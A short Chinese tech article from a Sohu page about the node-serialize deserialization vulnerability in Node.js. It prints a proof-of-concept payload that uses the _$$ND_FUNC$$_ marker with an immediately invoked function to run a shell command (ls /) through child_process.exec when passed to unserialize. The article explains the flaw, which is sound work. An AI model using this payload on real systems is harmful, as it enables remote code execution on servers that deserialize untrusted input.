搜狐首页 科技 神探狄仁杰4

手机搜狐

SOHU.COM

Node.js 这个反序列化的漏洞到底有多大?

外刊君还在考虑在公司内做一些Node.js的尝试,正要撸起袖子写几行代码,就被这个漏洞给吓尿了,。妈啊,这种惊天大漏洞,外刊君今年试点Node.js的kpi是不是完不成了?

这个漏洞是什么?

读了读上面这三篇文章,文中都提到了一个 node-serialize 的 Node.js 库。这个库提供的 API unserialize 函数提供了注入的可能:

  1. varserialize =require('node-serialize');

  2. varpayload ='{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /',function(error, stdout, stderr) { console.log(stdout)});}()"}';

  3. serialize.unserialize(payload);

精选